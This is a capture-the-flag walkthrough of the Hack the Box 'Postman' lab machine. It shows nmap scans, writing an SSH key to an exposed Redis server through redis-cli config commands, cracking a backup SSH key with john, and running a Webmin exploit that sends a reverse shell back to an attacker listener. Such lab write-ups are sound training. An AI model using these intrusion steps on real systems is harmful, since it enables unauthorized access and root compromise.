I enjoy doing CTFs and I think everyone should try them, they allow us to hone our skills while having a little fun at the same time. This walkthrough is for Hack the Box’s Postman machine which can be found here.
Early disclaimer all information that could lead to a quick win has been redacted, enjoy!
Enumeration
In the enumeration stage our goal is to get information on the target with the goal of finding some sort of vulnerability. My first step is to use nmap to get a feel for what ports are open on the target machine.
Lets break down the scan and what was found. sudo will allow us to run the nmap command at a high privilege level. -A does OS detection, service version detection, script scanning and traceroute. Note this is a very loud scan technique. -T4 sets the timing of the scan, this can be -T0 through -T5 where 5 is the fastest. Finally we have the IP address of the target machine.
sudo nmap -A -T4 10.129.2.1
In the results of the scan, we can see port 22 (SSH), 80 (http webpage) and 10000 (http webpage) are open. This was an intense scan which can take a long time to scan all the ports and by default nmap will only scan the top 1000 most common ports. For this reason it can be helpful to also use a quick scan of all ports.
sudo nmap -p- — max-retries 1 10.129.2.1
This shows us an additional service that we did not previously see was open. Port 6379 running Redis.
Now that we know the contents of the scan we can further enumerate the machine.
Let’s look at the hosted webpages:
This page is under construction and does not seem to contain any significant information.
On the login page we can try a couple of things like admin:admin, root:root, root:toor. Googling around I couldn’t find any listed default passwords for the service.
Note: I did not do it but here would have been a good time to run a webpage directory brute force scan. This can be done with Dirb or gobuster.
Next we can use searchsploit to try and find available exploits.
Here we can see one remote code execution but this requires credentials.
Redis Foothold
Next we will use searchsploit to see if there are any available for Redis
None of the available exploits are useful. We can use redis-tools to interact with the service and enumerate it.
Now that we have it installed we can use the following command to connect to the service:
redis-cli -h 10.129.2.1
The following screen shot shows me trying to figure out how to use redis-cli command as it was the first time I used it. The following command will display all configurations:
config get *
Here we can see “/var/lib/redis/ssh”. If we can write to that directory we could possibly upload our own ssh key to allow for ssh connection.
config set dir /var/lib/redis/.ssh
We are able to access the directory. Since we can access it the next question is how do we upload an ssh key. I found an article by Nairuz Abulhul that explains it very well. You can read that here. Next we will generate a ssh key pair:
With our new key now we need to upload it
10.129.2.1:6379> config set dir /var/lib/redis/.ssh
OK
10.129.2.1:6379> config set dbfilename “authorized_keys”
OK
10.129.2.1:6379> save
OK
Now that we have it uploaded we can try to connect to the server via ssh:
Privilege Escalation
Now we are back to enumerating the system. We need to find something that will allow us to get a session as a higher privileged user. I start manually looking through directories and trying commands like
sudo -l and find / -perm 4000 -print 2>/dev/null
We can see that there is another user called Matt:
We also find an interesting file id_rsa.bak. This would hint that someone made a backup of their ssh key.
With this we can attempt to crack it using john the ripper and the rockyou.txt password list.
Here we use ssh2john.py to turn the key into a readable format for john. Next we put that file into john and specified the rockyou.txt wordlist. This works and we get a password!
With this password we can now attempt a login to the web server:
One of the exploits I found this earlier required a username and password for RCE. We can now try that exploit. You can also find it here. Before we attempt to run this exploit we need to setup a listener on our machine:
sudo nc -lvp 1432
Now we run the exploit:
python webExploit.py — rhost 10.129.2.1 -u Matt -p [redacted] — lhost 10.10.16.101 — lport 1432 -s True
Now we can check our netcat listener:
We have now achieved a root shell which will allow us to get the flags on this box.
Conclusion
Thanks for joining me on this journey I had a blast and I learned something new! This box has introduced me to Redis and required me to do some research to complete it but the challenge has been overcome. I hope you share my sentiments and feel free to read my other hacking articles, Happy hacking!